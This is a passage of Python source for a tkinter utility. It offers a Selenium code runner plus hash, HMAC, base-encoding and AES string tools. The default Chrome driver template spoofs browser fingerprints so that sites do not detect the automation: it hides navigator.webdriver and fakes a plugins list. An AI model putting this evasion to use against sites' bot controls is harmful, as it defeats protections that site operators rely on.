driver.find_element_by_xpath('//*[@id="su"]').click()
# driver.find_element_by_xpath('//*[@id="su"]').get_attribute() # 获取属性
# 常用获取组件方式
# 1 find_element_* 直接获取组件对象,如果获取不到直接报错
# driver.find_element_by_id
# driver.find_element_by_name
# driver.find_element_by_xpath
# 2 find_elements_* 获取组件列表对象,如果获取不到不会报错,只会返回空
# driver.find_elements_by_id
# driver.find_elements_by_name
# driver.find_elements_by_xpath
# 获取 window 桌面绝对路径的代码,用于快速保存数据到可见位置
# desktop = os.path.join(os.path.expanduser("~"),'Desktop')
# 部分智能等待的代码,提高浏览器效率的处理,最好在生成的单独脚本中使用
# from selenium.webdriver.common.by import By
# from selenium.webdriver.support import expected_conditions as EC
# from selenium.webdriver.support.wait import WebDriverWait as wbw
# locator = (By.XPATH, '//img[@class="focus-item-img"]')
# # wbw(self.webdriver,10).until(EC.presence_of_element_located(locator)) # 判断某个元素是否被加到了dom树里
# wbw(self.webdriver,10).until(EC.visibility_of_element_located(locator)) # 判断某个元素是否被添加到了dom里并且可见,即宽和高都大于0
# 当你打包脚本时,在 get_driver 函数执行前执行以下代码,打包的后的工具就不会因为 selenium启动服务自动开启黑窗口了
# import subprocess
# _bak_Popen = subprocess.Popen
# def _Popen(*a, **kw):
# kw['creationflags'] = 0x08000000
# return _bak_Popen(*a, **kw)
# subprocess.Popen = _Popen
''')
btn2 = Button(temp_fr0, text='保存脚本到桌面', command=save_script_in_desktop)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='[执行代码] <Alt+v>', command=execute_selenium_code)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='启动浏览器driver <Alt+c>', command=start_selenium)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='关闭浏览器driver', command=close_selenium)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='执行代码模板', command=add_script)
btn2.pack(side=tkinter.RIGHT)
temp_fr0 = Frame(fr)
temp_fr0.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr1 = Frame(temp_fr0)
temp_fr1_1 = Frame(temp_fr1)
temp_fr1_1.pack(side=tkinter.TOP)
temp_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
txt1 = Text(temp_fr1,height=1,width=1,font=ft)
lab1 = Label(temp_fr1_1,text='可执行 python 代码')
lab1.pack(side=tkinter.TOP)
txt1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr2 = Frame(temp_fr0)
temp_fr2_1 = Frame(temp_fr2)
temp_fr2_1.pack(fill=tkinter.X,side=tkinter.TOP)
temp_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.RIGHT)
lab1 = Label(temp_fr2_1,text='启动 driver 的 python 代码')
lab1.pack(side=tkinter.TOP)
txt2 = Text(temp_fr2,height=1,width=1,font=ft)
txt2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
txt1.insert(tkinter.END, '''
print(driver)
'''.strip())
txt2.insert(tkinter.END, '''
def get_driver():
from selenium import webdriver
option = webdriver.ChromeOptions()
extset = ['enable-automation', 'ignore-certificate-errors']
ignimg = "profile.managed_default_content_settings.images"
mobile = {'deviceName':'Galaxy S5'}
# 需要哪些 driver 功能,请解开对应的代码注释再启动
option.add_argument("--disable-infobars") # 关闭调试信息
option.add_experimental_option("excludeSwitches", extset) # 关闭调试信息
option.add_experimental_option("useAutomationExtension", False) # 关闭调试信息
option.add_argument('--start-maximized') # 最大化
# option.add_experimental_option('mobileEmulation', mobile) # 手机模式
# option.add_experimental_option("prefs", {ignore_image: 2}) # 不加载图片
# option.add_argument('--headless') # 【*】 无界面
# option.add_argument('--no-sandbox') # 【*】 沙箱模式
# option.add_argument('--disable-dev-shm-usage') # 【*】 in linux
# option.add_argument('--window-size=1920,1080') # 无界面最大化
# option.add_argument('--disable-gpu') # 禁用 gpu 加速
# option.add_argument("--auto-open-devtools-for-tabs") # F12
# option.add_argument("--user-agent=Mozilla/5.0 VILAME") # 修改 UA
# option.add_argument('--proxy-server=http://127.0.0.1:8888') # 代理
webdriver = webdriver.Chrome(chrome_options=option)
# 指纹相关的处理,能处理部分检测。
webdriver.execute_cdp_cmd("Page.addScriptToEvaluateOnNewDocument", {
"source": """
Object.defineProperty(navigator, 'webdriver', { get: () => undefined });
Object.defineProperty(navigator, "plugins", { get: () => [1,2,3,4,5] });
"""
})
webdriver.execute_cdp_cmd("Network.enable", {})
return webdriver
'''.strip())
temp_fr3 = Frame(fr)
lab3 = Label(temp_fr3, text='代码结果 [Esc 切换显示状态]')
lab3.pack(side=tkinter.TOP)
cd = Text(temp_fr3,font=ft)
cd.pack(fill=tkinter.BOTH,expand=True)
try:
from idlelib.colorizer import ColorDelegator
from idlelib.percolator import Percolator
p = ColorDelegator()
Percolator(txt1).insertfilter(p)
except:
e = traceback.format_exc()
txt1.delete(0.,tkinter.END)
txt1.insert(0.,e)
try:
from idlelib.colorizer import ColorDelegator
from idlelib.percolator import Percolator
p = ColorDelegator()
Percolator(txt2).insertfilter(p)
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
# 确保强制退出时能关闭 webdriver 进程,防止幽灵进程
from .root import tails
tails.append(clear_selenium_driver)
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'selenium'
frame_setting[fr]['execute_func'] = execute_selenium_code
frame_setting[fr]['start_selenium'] = start_selenium
frame_setting[fr]['fr_temp2'] = temp_fr3 # 代码执行框,这里仍需挂钩esc按键显示/关闭该窗口
return fr
def encode_window(setting=None):
'''
处理简单的加密编码对比
'''
fr = tkinter.Toplevel()
fr.title('命令行输入 ee 则可快速打开便捷加密窗口(为防冲突,输入vv e也可以打开), 组合快捷键 Alt+` 快速打开IDLE')
fr.resizable(False, False)
try:
try:
from .tab import create_temp_idle
except:
from tab import create_temp_idle
fr.bind('<Alt-`>',lambda *a:create_temp_idle())
except:
pass
enb = ttk.Notebook(fr)
enb_names = {}
_fr = Frame(fr)
enb.add(_fr, text='hash')
enb.pack()
enb_names[_fr._name] = 'hash'
f0 = Frame(_fr)
f0.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
f0_ = Frame(_fr)
f0_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
f1 = Frame(f0)
f2 = Frame(f0)
f1.pack(fill=tkinter.BOTH,expand=True)
f2.pack(fill=tkinter.BOTH,expand=True)
algorithms = hashlib.algorithms_available
algorithms.add('md2')
try:
from . import pymd2
except:
import pymd2
ipadx = 0
ipady = 0
padx = 1
pady = 1
width = 60
sticky = 'NESW'
ft = Font(family='Consolas',size=10)
crow = 0
ls = []
di = {}
dh = {}
allow = [
'blake2b',
'blake2s',
'md2',
'md4',
'md5',
'ripemd160',
'sha',
'sha1',
'sha224',
'sha256',
'sha384',
'sha3_224',
'sha3_256',
'sha3_384',
'sha3_512',
'sha512',
'whirlpool'
]
for idx,name in enumerate(sorted(algorithms)+sorted(algorithms)):
if name in allow and idx < len(algorithms):
if name == 'md2':
hlen = 32
else:
hlen = len(hmac.new(b'',b'',name).hexdigest())
l,e = Label(f2,text='[*]'+name+'[len:{}]'.format(str(hlen)),font=ft),Entry(f2,width=width,font=ft)
dh[name] = e
l.grid(row=idx,column=0,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
e.grid(row=idx,column=1,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
if name in allow and idx >= len(algorithms):
if name == 'md2':
continue
else:
hlen = len(hmac.new(b'',b'',name).hexdigest())
l,e = Label(f2,text='[hmac]'+name+'[len:{}]'.format(str(hlen)),font=ft),Entry(f2,width=width,font=ft)
di[name] = e
l.grid(row=idx,column=0,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
e.grid(row=idx,column=1,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
def func(*a):
def _show(*a, stat='show'):
try:
if stat == 'show': ss.pack(side=tkinter.LEFT)
if stat == 'hide': ss.pack_forget()
except:
pass
_show(stat='show') if va.get() else _show(stat='hide')
f11 = Frame(f1)
f11.pack(fill=tkinter.X)
def _switch_case(*a):
for name,ge in di.items():
try:
v = ge.get().upper() if ca.get() else ge.get().lower()
ge.delete(0,tkinter.END)
ge.insert(0,v)
except:
import traceback; traceback.print_exc()
print('error',name)
for name,ge in dh.items():
try:
v = ge.get().upper() if ca.get() else ge.get().lower()
ge.delete(0,tkinter.END)
ge.insert(0,v)
except:
import traceback; traceback.print_exc()
print('error',name)
def _swich_encd(*a):
s = en.get().strip()
if s == 'utf-8':
en.delete(0,tkinter.END)
en.insert(0,'gbk')
elif s == 'gbk':
en.delete(0,tkinter.END)
en.insert(0,'utf-8')
else:
en.delete(0,tkinter.END)
en.insert(0,'utf-8')
ca = tkinter.IntVar()
rb = Checkbutton(f11,text='hash编码是否大写',variable=ca,command=_switch_case)
rb.pack(side=tkinter.RIGHT)
rb.deselect()
en = Entry(f11, width=6, font=ft)
en.insert(0,'utf-8')
en.pack(side=tkinter.RIGHT)
Button(f11,text='编码方式',command=_swich_encd).pack(side=tkinter.RIGHT,padx=2)
ss = Entry(f11)
va = tkinter.IntVar()
rb = Checkbutton(f11,text='添加密盐参数',variable=va,command=func)
rb.pack(side=tkinter.LEFT,padx=10)
Label(f1,text='加密或编解码文本').pack(side=tkinter.LEFT,padx=10)
ee = Entry(f1)
ee.pack(side=tkinter.LEFT)
def _encode_all(*a):
encd = en.get().strip()
salt = ss.get().encode(encd) if va.get() else b''
text = ee.get().encode(encd)
for name,ge in di.items():
try:
# if name == 'md2': name = pymd2.md2
v = hmac.new(salt,text,name).hexdigest()
v = v.upper() if ca.get() else v.lower()
ge.delete(0,tkinter.END)
ge.insert(0,v)
except:
import traceback; traceback.print_exc()
print('error',name)
def _encode_hash(*a):
encd = en.get().strip()
salt = ss.get().encode(encd) if va.get() else b''
text = ee.get().encode(encd)
for name,ge in dh.items():
try:
if name == 'md2':
v = pymd2.md2(text)
else:
v = hashlib.new(name,text).hexdigest()
v = v.upper() if ca.get() else v.lower()
ge.delete(0,tkinter.END)
ge.insert(0,v)
except:
import traceback; traceback.print_exc()
print('error',name)
Button(f1, text='hmac',command=_encode_all,width=5).pack(side=tkinter.RIGHT)
Button(f1, text='hash',command=_encode_hash,width=5).pack(side=tkinter.RIGHT)
f1_ = Frame(f0_)
f1_.pack(fill=tkinter.BOTH)
f2_ = Frame(f0_)
f2_.pack(fill=tkinter.BOTH,expand=True)
lb_ = Label(f1_,text='compare(对比字符串)')
lb_.pack(side=tkinter.LEFT,padx=10,pady=pady)
et_ = Entry(f1_,width=30)
et_.pack(side=tkinter.LEFT,padx=padx,pady=pady)
import difflib
def _diff_log(a, b):
d = difflib.Differ()
s = d.compare(a.splitlines(), b.splitlines())
for i in s:
print(i)
def print(*a, end='\n'):
# import pprint
# pprint.pprint(enb_names)
name = enb.select().rsplit('.')[-1]
if enb_names[name] == 'hash':
txt.insert(tkinter.END,' '.join(map(str,a)) + end)
elif enb_names[name] == '算法加解密':
ftxt.insert(tkinter.END,' '.join(map(str,a)) + end)
elif enb_names[name] == '依赖库加解密':
ctxt.insert(tkinter.END,' '.join(map(str,a)) + end)
elif enb_names[name] == '通用解密':
bbtxt.insert(tkinter.END,' '.join(map(str,a)) + end)
elif enb_names[name] == '爆破;RSA;二维码':
fsstxt.insert(tkinter.END,' '.join(map(str,a)) + end)
elif enb_names[name] == '图片相关':
fpictxt.insert(tkinter.END,' '.join(map(str,a)) + end)
fpictxt.update()
def _analysis_diff(*a):
txt.delete(0.,tkinter.END)
it = []
for name,ge in list(dh.items()):
try:
a, b = et_.get(), ge.get()
s = difflib.SequenceMatcher(None, a.upper(), b.upper())
q = s.find_longest_match(0, len(a), 0, len(b))
if q.size>0:
it.append([name, a, b, q.size])
except:
import traceback; traceback.print_exc()
print('error',name)
for name,ge in list(di.items()):
try:
a, b = et_.get(), ge.get()
s = difflib.SequenceMatcher(None, a.upper(), b.upper())
q = s.find_longest_match(0, len(a), 0, len(b))
if q.size>0:
it.append(['[hmac]'+name, a, b, q.size])
except:
import traceback; traceback.print_exc()
print('error',name)
cnt = 0
for name,a,b,max_match in sorted(it,key=lambda max_match:-max_match[3])[:5]:
cnt += 1
s = difflib.SequenceMatcher(None, a.upper(), b.upper())
print('max_match_len:{}'.format(max_match))
print('len[compare]:{}'.format(len(a), ))
print('len[{}]:{}'.format(name, len(b)))
matchcnt = 0
for match in sorted(s.get_matching_blocks(),key=lambda i:-i.size):
if match.size:
v = a[match.a:match.a+match.size]
matchcnt += match.size
print(' [match.size:{}] {}'.format(match.size, v))
print(' [match.count:{}]'.format(matchcnt))
print('---------------')
if not cnt:
print('not match.')
def _creat_code(*a):
import pprint
txt.delete(0.,tkinter.END)
salt = ss.get().strip() if va.get() else ''
text = ee.get().strip()
compare_str = et_.get().strip()
code = '''
import hmac
import hashlib
# md2 算法
def _hash(message, printdebug=False):
assert isinstance(message, list)
msg = list(message)
if printdebug: print("md2.hash(message = {} bytes)".format(len(message)))
padlen = _BLOCK_SIZE - (len(msg) % _BLOCK_SIZE)
msg.extend([padlen] * padlen)
state = tuple([0] * 48)
checksum = tuple([0] * 16)
assert len(msg) % _BLOCK_SIZE == 0
for i in range(len(msg) // _BLOCK_SIZE):
block = tuple(msg[i * _BLOCK_SIZE : (i + 1) * _BLOCK_SIZE])
state, checksum = _compress(block, state, checksum, printdebug)
state, checksum = _compress(checksum, state, checksum, printdebug)
return list(state[ : 16])
def _compress(block, state, checksum, printdebug):
assert isinstance(block, tuple) and len(block) == _BLOCK_SIZE
assert isinstance(state, tuple) and len(state) == 48
assert isinstance(checksum, tuple) and len(checksum) == 16
newstate = list(state)
for i in range(16):
b = block[i]
assert 0 <= b <= 0xFF
newstate[i + 16] = b
newstate[i + 32] = b ^ newstate[i]
t = 0
for i in range(18):
for j in range(len(newstate)):
newstate[j] ^= _SBOX[t]
t = newstate[j]
t = (t + i) & 0xFF
newchecksum = list(checksum)
l = newchecksum[-1]
for i in range(16):
l = newchecksum[i] ^ _SBOX[block[i] ^ l]
newchecksum[i] = l
return (tuple(newstate), tuple(newchecksum))
_BLOCK_SIZE = 16 # In bytes
_SBOX = [ # A permutation of the 256 byte values, from 0x00 to 0xFF
0x29, 0x2E, 0x43, 0xC9, 0xA2, 0xD8, 0x7C, 0x01, 0x3D, 0x36, 0x54, 0xA1, 0xEC, 0xF0, 0x06, 0x13,
0x62, 0xA7, 0x05, 0xF3, 0xC0, 0xC7, 0x73, 0x8C, 0x98, 0x93, 0x2B, 0xD9, 0xBC, 0x4C, 0x82, 0xCA,
0x1E, 0x9B, 0x57, 0x3C, 0xFD, 0xD4, 0xE0, 0x16, 0x67, 0x42, 0x6F, 0x18, 0x8A, 0x17, 0xE5, 0x12,
0xBE, 0x4E, 0xC4, 0xD6, 0xDA, 0x9E, 0xDE, 0x49, 0xA0, 0xFB, 0xF5, 0x8E, 0xBB, 0x2F, 0xEE, 0x7A,
0xA9, 0x68, 0x79, 0x91, 0x15, 0xB2, 0x07, 0x3F, 0x94, 0xC2, 0x10, 0x89, 0x0B, 0x22, 0x5F, 0x21,
0x80, 0x7F, 0x5D, 0x9A, 0x5A, 0x90, 0x32, 0x27, 0x35, 0x3E, 0xCC, 0xE7, 0xBF, 0xF7, 0x97, 0x03,
0xFF, 0x19, 0x30, 0xB3, 0x48, 0xA5, 0xB5, 0xD1, 0xD7, 0x5E, 0x92, 0x2A, 0xAC, 0x56, 0xAA, 0xC6,
0x4F, 0xB8, 0x38, 0xD2, 0x96, 0xA4, 0x7D, 0xB6, 0x76, 0xFC, 0x6B, 0xE2, 0x9C, 0x74, 0x04, 0xF1,
0x45, 0x9D, 0x70, 0x59, 0x64, 0x71, 0x87, 0x20, 0x86, 0x5B, 0xCF, 0x65, 0xE6, 0x2D, 0xA8, 0x02,
0x1B, 0x60, 0x25, 0xAD, 0xAE, 0xB0, 0xB9, 0xF6, 0x1C, 0x46, 0x61, 0x69, 0x34, 0x40, 0x7E, 0x0F,
0x55, 0x47, 0xA3, 0x23, 0xDD, 0x51, 0xAF, 0x3A, 0xC3, 0x5C, 0xF9, 0xCE, 0xBA, 0xC5, 0xEA, 0x26,
0x2C, 0x53, 0x0D, 0x6E, 0x85, 0x28, 0x84, 0x09, 0xD3, 0xDF, 0xCD, 0xF4, 0x41, 0x81, 0x4D, 0x52,
0x6A, 0xDC, 0x37, 0xC8, 0x6C, 0xC1, 0xAB, 0xFA, 0x24, 0xE1, 0x7B, 0x08, 0x0C, 0xBD, 0xB1, 0x4A,
0x78, 0x88, 0x95, 0x8B, 0xE3, 0x63, 0xE8, 0x6D, 0xE9, 0xCB, 0xD5, 0xFE, 0x3B, 0x00, 0x1D, 0x39,
0xF2, 0xEF, 0xB7, 0x0E, 0x66, 0x58, 0xD0, 0xE4, 0xA6, 0x77, 0x72, 0xF8, 0xEB, 0x75, 0x4B, 0x0A,
0x31, 0x44, 0x50, 0xB4, 0x8F, 0xED, 0x1F, 0x1A, 0xDB, 0x99, 0x8D, 0x33, 0x9F, 0x11, 0x83, 0x14,
]
def md2hex(message:bytes):
s = _hash(list(message))
v = 0
for idx,i in enumerate(s[::-1]):
v += i << idx*8
return hex(v)[2:]
def encode_all(text,debug=False):
text = text.encode() if type(text) == str else text
ret = {}
for name in allow:
v = md2hex(text) if name == 'md2' else hashlib.new(name, text).hexdigest()
v = v.upper() if upper else v.lower()
ret[name] = v
if debug: print('[*]{:<10}{}'.format(name, v))
return ret
def encode_all_withsalt(salt,text,debug=False):
salt = salt.encode() if type(salt) == str else salt
text = text.encode() if type(text) == str else text
ret = {}
for name in allow:
if name == 'md2':continue
v = hmac.new(salt,text,name).hexdigest()
v = v.upper() if upper else v.lower()
ret[name] = v
if debug: print('[hmac]{:<10}{}'.format(name, v))
return ret
allow = \
$allow
upper = True # 是否使用大写
if __name__ == '__main__':
salt = '$salt' # 字符串/byte类型 盐(默认空)
text = '$text' # 字符串/byte类型 需要被加密的数据
import pprint
v = encode_all(text)
print('[*]')
pprint.pprint(v)
print()
print('[hmac]')
v = encode_all_withsalt(salt,text)
pprint.pprint(v)
'''.strip()
code = code.replace('$allow', pprint.pformat(allow))
code = code.replace('$compare_str', compare_str)
code = code.replace('$salt', salt)
code = code.replace('$text', text)
print(code)
bt_ = Button(f1_,text='分析对比[忽略大小写]',command=_analysis_diff)
bt_.pack(side=tkinter.LEFT,padx=padx,pady=pady,)
bt2_ = Button(f1_,text='测用代码',command=_creat_code)
bt2_.pack(side=tkinter.LEFT,padx=padx,pady=pady,)
txt = Text(f2_,font=ft)
txt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
basehp = r'''
通用加解密(请将需要加/解密的数据输入右侧窗口)
base加密:
[-] 这种类型只能对数字进行加解密
[*] 这种类型能对一般数据流进行加解密
[/] 这种类型通过正则切分并针对字符串内的数字进行 bytes 转换
base_8 RegExp:[0-7]{1,3} : r"\o123\o123" => bytes([0o123, 0o123])
r"123123" => bytes([0o123, 0o123])
base_10 RegExp:[0-9]{1,3} : r"\123\123" => bytes([123, 123])
r"123123" => bytes([123, 123])
base_16 RegExp:[0-9a-fA-F]{2}: r"\xbe\xac" => bytes([0xbe, 0xac])
r"beac" => bytes([0xbe, 0xac])
(由于输出框不显示无法解码数据,如需 bit 类型数据请直接使用"其他算法")
注意:
左边 Entry 控件在单行文书输入过长时会有卡顿甚至卡死
右边 Text 控件虽然也有相同的问题,但能接受更长的单行文本(行数不限)
所以长字符串的加解密,请使用单独的加解密按钮实现
全部加解密:
[input] 使用右边->窗口为输入 [output] 使用左边<-窗口为输出
单独加解密:
[input] 使用右边->窗口为输入 [output] 使用右边->窗口为输出
'''.strip('\n')
_fr = Frame(fr)
enb.add(_fr, text='通用解密')
enb.pack()
enb_names[_fr._name] = '通用解密'
f3 = Frame(_fr)
f3.pack(side=tkinter.LEFT,fill=tkinter.BOTH)
f3_ = Frame(_fr)
f3_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
f4 = Frame(f3)
f5 = Frame(f3)
f4.pack(fill=tkinter.BOTH)
f5.pack(fill=tkinter.BOTH,expand=True)
base_algos = [
'base36', # apparently only useful for mapping integers
'base62', # apparently only useful for mapping integers
'base16',
'base32',
'base58',
'base64',
'urlsafe_b64',
'base85',
'base91',
]
bs = {}
html_quote = [
'base_2',
'base_8',
'base_10',
'base_16',
'quote',
'urlquote',
'escape',
'unicode',
]
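# The two name lists above are dispatched through the bundled pybase.base_algos and
# pyplus.html_quote tables, each mapping a name to an (encode, decode) pair (see
# _b_encode/_b_decode below). A minimal sketch, assuming those bundled modules:
#   enc, dec = pybase.base_algos['base64']
#   enc(b'abc')     # -> 'YWJj' (bytes or str, depending on the codec)
#   dec(b'YWJj')    # -> b'abc'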
for idx,name in enumerate(base_algos+html_quote):
if name in base_algos:
t = '[*]' if name not in ('base36', 'base62') else '[-]'
l,e = Label(f5,text=t+name,font=ft),Entry(f5,width=width,font=ft)
b1,b2 = Button(f5,text='加',width=3), Button(f5,text='解',width=3)
b2.grid(row=idx,column=3,ipadx=0,ipady=0,padx=0,pady=0,sticky=sticky)
b1.grid(row=idx,column=2,ipadx=0,ipady=0,padx=0,pady=0,sticky=sticky)
bs[name] = e,b1,b2
e.grid(row=idx,column=1,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
l.grid(row=idx,column=0,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
if name in html_quote:
if name.startswith('base_'): name = '[/]' + name
l,e = Label(f5,text=name,font=ft),Entry(f5,width=width,font=ft)
b1,b2 = Button(f5,text='加',width=3), Button(f5,text='解',width=3)
b2.grid(row=idx,column=3,ipadx=0,ipady=0,padx=0,pady=0,sticky=sticky)
b1.grid(row=idx,column=2,ipadx=0,ipady=0,padx=0,pady=0,sticky=sticky)
bs[name] = e,b1,b2
e.grid(row=idx,column=1,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
l.grid(row=idx,column=0,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
def _b_encode(*a):
encd = bben.get().strip()
text = bbtxt.get(0.,tkinter.END).strip('\n').encode(encd)
limit = 1000
if len(text) > limit:
print('error ! 由于Entry组件性能问题,全部加密解密模式只能在右侧窗口直接使用[单独加解进行]')
print('当前加密字符串的长度为{},超过限制{}'.format(len(text), limit))
print('\n'*10)
bbtxt.see(tkinter.END)
return
try:
from . import pybase, pyplus
except:
import pybase, pyplus
for name,(ge,gb1,gb2) in bs.items():
ge.delete(0,tkinter.END)
try:
if name in base_algos:
base_encode, base_decode = pybase.base_algos[name]
ge.insert(0,base_encode(text))
name = name.strip('[/]')
if name in html_quote:
plus_encode, plus_decode = pyplus.html_quote[name]
ge.insert(0,plus_encode(text, encd))
except:
import traceback; traceback.print_exc()
ge.insert(0,'error.!')
if name in ('base36', 'base62'):
ge.insert(tkinter.END,'{} can only parse int type.'.format(name))
def _b_decode(*a):
encd = bben.get().strip()
text = bbtxt.get(0.,tkinter.END).strip('\n').encode()
limit = 1000
if len(text) > limit:
print('error ! 由于Entry组件性能问题,全部加密解密模式只能在右侧窗口直接使用[单独加解进行]')
print('当前加密字符串的长度为{},超过限制{}'.format(len(text), limit))
print('\n'*10)
bbtxt.see(tkinter.END)
return
try:
from . import pybase, pyplus
except:
import pybase, pyplus
for name,(ge,gb1,gb2) in bs.items():
ge.delete(0,tkinter.END)
try:
if name in base_algos:
base_encode, base_decode = pybase.base_algos[name]
ge.insert(0,base_decode(text).decode(encd))
name = name.strip('[/]')
if name in html_quote:
plus_encode, plus_decode = pyplus.html_quote[name]
ge.insert(0,plus_decode(text.decode(), encoding=encd))
except:
import traceback; traceback.print_exc()
ge.insert(0,'error')
def _pybase_code(*a):
try:
from . import pybase
except:
import pybase
bbtxt.delete(0.,tkinter.END)
with open(pybase.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _pyplus_code(*a):
try:
from . import pyplus
except:
import pyplus
bbtxt.delete(0.,tkinter.END)
with open(pyplus.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def pack_button(name):
def do():
nonlocal name
encd = bben.get().strip()
text = bbtxt.get(0.,tkinter.END).strip('\n').encode(encd)
bbtxt.delete(0.,tkinter.END)
try:
from . import pybase, pyplus
except:
import pybase, pyplus
try:
if name in base_algos:
base_encode, base_decode = pybase.base_algos[name]
v = base_encode(text)
v = v.decode() if isinstance(v, bytes) else v
print(v)
name = name.strip('[/]')
if name in html_quote:
plus_encode, plus_decode = pyplus.html_quote[name]
print(plus_encode(text, encd))
except:
import traceback
print(traceback.format_exc())
def undo():
nonlocal name
encd = bben.get().strip()
text = bbtxt.get(0.,tkinter.END).strip('\n').encode()
bbtxt.delete(0.,tkinter.END)
try:
from . import pybase, pyplus
except:
import pybase, pyplus
try:
if name in base_algos:
base_encode, base_decode = pybase.base_algos[name]
print(base_decode(text).decode(encd))
name = name.strip('[/]')
if name in html_quote:
plus_encode, plus_decode = pyplus.html_quote[name]
print(plus_decode(text.decode(), encoding=encd))
except:
import traceback
print(traceback.format_exc())
class d:pass
d.do = do
d.undo = undo
return d
Label(f4,text=basehp,font=ft).pack(side=tkinter.TOP,padx=6)
Button(f4,text='其他算法',width=8,command=_pyplus_code).pack(side=tkinter.RIGHT)
Button(f4,text='base算法',width=8,command=_pybase_code).pack(side=tkinter.RIGHT)
Button(f4,text='全部解密',width=8,command=_b_decode).pack(side=tkinter.RIGHT)
Button(f4,text='全部加密',width=8,command=_b_encode).pack(side=tkinter.RIGHT)
def _swich_bben(*a):
s = bben.get().strip()
if s == 'utf-8':
bben.delete(0,tkinter.END)
bben.insert(0,'gbk')
elif s == 'gbk':
bben.delete(0,tkinter.END)
bben.insert(0,'utf-8')
else:
bben.delete(0,tkinter.END)
bben.insert(0,'utf-8')
f4_ = Frame(f3_)
f4_.pack(fill=tkinter.BOTH)
f5_ = Frame(f3_)
f5_.pack(fill=tkinter.BOTH,expand=True)
Button(f4_, text='编码',command=_swich_bben,width=6).pack(side=tkinter.LEFT)
bben = Entry(f4_,width=5)
bben.insert(0,'utf-8')
bben.pack(side=tkinter.LEFT)
bbtxt = Text(f5_,font=ft)
bbtxt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
for name,(ge,gb1,gb2) in bs.items():
d = pack_button(name)
gb1['command'] = d.do
gb2['command'] = d.undo
_fr0 = Frame(fr)
enb.add(_fr0, text='算法加解密')
enb.pack()
enb_names[_fr0._name] = '算法加解密'
ff0 = Frame(_fr0)
ff0.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
ff0_ = Frame(_fr0)
ff0_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
def _my_encode(*a):
estr = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
_ack = ent22.get().strip() if aa.get() else ''
base = cbx.get()
try:
from . import pyzlibaes
except:
import pyzlibaes
c = pyzlibaes.crypter(_ack, base=base)
print(c.zencrypt(estr))
def _my_decode(*a):
dstr = ftxt.get(0.,tkinter.END).strip('\n')
_ack = ent22.get().strip() if aa.get() else ''
base = cbx.get()
try:
from . import pyzlibaes
except:
import pyzlibaes
c = pyzlibaes.crypter(_ack, base=base)
try:
s = c.zdecrypt(dstr)
ftxt.delete(0.,tkinter.END)
print(s)
except:
tkinter.messagebox.showinfo('Error','密码或解密文本错误.\n\n'+traceback.format_exc())
def _my_code(*a):
ftxt.delete(0.,tkinter.END)
try:
from . import pyzlibaes
except:
import pyzlibaes
ftxt.delete(0.,tkinter.END)
with open(pyzlibaes.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
pure_python_encrypthelp = '''
纯 python 实现的加解密算法
该处大部分算法均为从各个地方收集而来的、或是我自己写的纯 python 实现的加解密算法,
如果没有特别苛刻的环境要求,请还是尽量使用成熟的加解密函数库来实现
'''.strip('\n')
f20 = Frame(ff0)
f20.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f20, text=pure_python_encrypthelp,font=ft).pack(fill=tkinter.X,expand=True)
f21 = Frame(ff0)
f21.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f21, text=' 以下算法为个人私用。应对 python 压缩的、无外部依赖库的、混合AES的、字符串加解密。').pack(fill=tkinter.X,expand=True)
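# Sketch of the bundled pyzlibaes usage wired to the buttons below (names and arguments follow
# _my_encode/_my_decode; the compress+AES+base-encode behaviour is per the description above):
#   c = pyzlibaes.crypter('my-password', base='b64')
#   token = c.zencrypt('hello')
#   c.zdecrypt(token)    # -> 'hello'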
f22 = Frame(ff0)
f22.pack(side=tkinter.TOP,fill=tkinter.X)
ent22 = Entry(f22,width=10)
def _switch_ack(*a):
def _show(*a, stat='show'):
try:
if stat == 'show': ent22.pack(side=tkinter.LEFT)
if stat == 'hide': ent22.pack_forget()
except:
pass
_show(stat='show') if aa.get() else _show(stat='hide')
aa = tkinter.IntVar()
ab = Checkbutton(f22,text='密码',variable=aa,command=_switch_ack)
ab.pack(side=tkinter.LEFT)
ab.deselect()
cbx = Combobox(f22,width=4,state='readonly')
cbx['values'] = base64enc = ['b16','b32','b64','b85',]
cbx.current(3)
cbx.pack(side=tkinter.RIGHT)
Label(f22, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
Button(f22, text='[算法]',command=_my_code,width=5).pack(side=tkinter.RIGHT)
Button(f22, text='解密',command=_my_decode,width=5).pack(side=tkinter.RIGHT)
Button(f22, text='加密',command=_my_encode,width=5).pack(side=tkinter.RIGHT)
